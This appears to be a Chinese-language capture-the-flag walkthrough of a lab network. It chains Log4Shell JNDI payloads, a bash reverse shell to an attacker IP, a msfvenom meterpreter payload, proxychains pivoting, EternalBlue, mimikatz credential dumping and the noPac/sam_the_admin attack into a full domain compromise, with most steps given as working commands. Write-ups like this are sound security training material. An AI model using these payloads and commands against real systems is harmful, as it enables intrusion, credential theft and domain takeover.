外網(wǎng)打點(diǎn)

首先對(duì)web進(jìn)行端口掃描，發(fā)現(xiàn)38080端口和22端口

訪問(wèn)一下38080端口發(fā)現(xiàn)是一個(gè)error page

用WAppalyzer看一下是什么架構(gòu)，但是好像沒(méi)有檢測(cè)出來(lái)

拿著報(bào)錯(cuò)去百度上發(fā)現(xiàn)應(yīng)該是springboot

索性用goby再去掃一下，應(yīng)該是spring沒(méi)錯(cuò)，但是沒(méi)有漏洞是什么操作？聯(lián)想到最近出的log4j2的洞，可能他只是一個(gè)日志文件所以并沒(méi)有框架

使用payload=${
jndi:ldap://p9j8l8.DNSlog.cn}驗(yàn)證一下有回顯證明存在漏洞

嘗試進(jìn)一步利用漏洞，首先起一個(gè)ldap服務(wù)，ip為本地接收shell的ip地址

JAVA -jar JNDIExploit-1.3-SNAPSHOT.jar -i 192.168.1.105

抓包修改Content-Type:
appllication/x-www-form-urlencoded，并執(zhí)行以下payload成功回顯

payload=${jndi:ldap://192.168.1.105:1389/TomcatBypass/TomcatEcho}

執(zhí)行l(wèi)s -al /看一下也成功

nc開(kāi)啟監(jiān)聽(tīng)端口

然后使用bash命令反彈，這里需要先base64編碼然后對(duì)編碼后的特殊字符進(jìn)行2層url轉(zhuǎn)碼

bash -i >& /dev/tcp/192.168.1.105/9999 0>&1

抓包添加payload=${
jndi:ldap:1/192.168.199.140:1389/TomcatBypass/Command/Base64/二層轉(zhuǎn)碼之后的字符}，即可得到反彈shell

進(jìn)行信息搜集發(fā)現(xiàn)為Docker環(huán)境，這里嘗試了docker逃逸失敗，那么繼續(xù)進(jìn)行信息搜集

在根目錄下找到了第一個(gè)flag，這里有一個(gè)got this，在之前端口掃描的時(shí)候看到開(kāi)放了22端口，嘗試使用ssh直接連接

使用xshell嘗試連接

連接成功，拿到了宿主機(jī)的權(quán)限

內(nèi)網(wǎng)滲透

ifconfig查看網(wǎng)卡情況發(fā)現(xiàn)還有一張10.0.1.0/24段的網(wǎng)卡

這里方便的話其實(shí)可以使用cs上線linux后用cs繼續(xù)打，這里我就沒(méi)有上線cs，使用linux的命令對(duì)10.0.1.0/24段探測(cè)存貨主機(jī)

for i in 10.0.1.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i Find the target; fi; done

ping一下是存活的

使用毒液把流量代理出來(lái)，首先開(kāi)啟監(jiān)聽(tīng)

admin.exe -lport 7777

然后上傳agent_linux到靶機(jī)上

加權(quán)并執(zhí)行

chmod 777 agent_linux_x86
agent_linux_x86 -rhost 192.168.1.105 -rport 7777

連接成功

這里本來(lái)準(zhǔn)備用毒液的代理到msf打的，后面覺(jué)得比較麻煩，就直接用kali生成的elf馬上線msf了

首先生成一個(gè)32位的elf馬

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf

然后加權(quán)并執(zhí)行

chmod 777 shell.elf

./shell

kali使用exploit/multi/handler進(jìn)行監(jiān)聽(tīng)

獲取到宿主機(jī)的shell

然后添加10.0.1.0/24段的路由

bg

route add 10.0.1.0 255.255.255.0 1
route print

然后配置proxychain4.conf文件并使用socks模塊

search socks
use auxiliary/sevrer/socks_proxy
run

我們?cè)谥耙呀?jīng)知道了內(nèi)網(wǎng)主機(jī)的ip，那么這里我們直接使用proxychain配合nmap對(duì)10.0.1.7的端口進(jìn)行掃描

proxychains4 nmap -sT -Pn 10.0.1.7

發(fā)現(xiàn)有445端口，那么對(duì)445端口進(jìn)一步掃描

先確定一下系統(tǒng)版本，使用
auxiliary/scanner/smb/smb_version模塊，發(fā)現(xiàn)是win7 sp1

看能不能利用永恒之藍(lán)，這里使用到
auxiliary/scanner/smb/smb_ms17_010模塊，發(fā)現(xiàn)可以利用永恒之藍(lán)

使用
exploit/windows/smb/ms17_010_eternalbule模塊，因?yàn)槭遣怀鼍W(wǎng)環(huán)境，這里需要用到bind_tcp載荷

run之后拿到一個(gè)system權(quán)限的meterpreter

在C:UsersrootDesktop下拿到第二個(gè)flag

然后繼續(xù)進(jìn)行信息搜集，發(fā)現(xiàn)同樣是雙網(wǎng)卡，還存在10.0.0.0/24段的一張網(wǎng)卡

ipconfig /all看到dns服務(wù)器為redteam.lab應(yīng)該在域內(nèi)

這里ping一下redteam.lab得到域控的ip為10.0.0.12

這里不知道域控有什么洞，先上傳一個(gè)mimikatz把密碼抓取出來(lái)，得到Administrator/Admin12345，這里其實(shí)就可以使用域管賬戶ipc直接連接，但是這里抓到了一個(gè)域用戶，嘗試使用最新的CVE-2021-42287、CVE-2021-42278來(lái)進(jìn)行攻擊，關(guān)于漏洞的原理請(qǐng)移步

privilege::debug
sekurlsa::logonpasswords

這里我準(zhǔn)備使用noPac.exe直接去獲取一個(gè)shell的，但是這里noPac.exe的利用條件是需要主機(jī)上有.net4.0環(huán)境，所以這里沒(méi)有回顯

noPac.exe下載地址：
https://github.com/cube0x0/noPac

本來(lái)準(zhǔn)備一步一步的用原始的方法打的，但是powershell用不了沒(méi)有回顯，就寫(xiě)一下原始利用的步驟吧

首先創(chuàng)建一個(gè)機(jī)器賬戶，可以使用 impacket 的 addcomputer.py或是powermadaddcomputer.py是利用SAMR協(xié)議創(chuàng)建機(jī)器賬戶，這個(gè)方法所創(chuàng)建的機(jī)器賬戶沒(méi)有SPN，所以可以不用清除

清除機(jī)器賬戶的servicePrincipalName屬性

將機(jī)器賬戶的sAmaccountName，更改為DC的機(jī)器賬戶名字，注意后綴不帶$

為機(jī)器賬戶請(qǐng)求TGT

將機(jī)器賬戶的sAMAccountName更改為其他名字，不與步驟3重復(fù)即可

通過(guò)S4U2self協(xié)議向DC請(qǐng)求ST

進(jìn)行 DCsync Attack

這里直接使用sam_the_admin.py進(jìn)行攻擊

proxychains Python3 sam_the_admin.py "redteam/root:Red12345" -dc-ip 10.0.0.12 -shell

即可拿到DC的shell

在C:UsersAdministratorDesktop下找到最后一個(gè)flag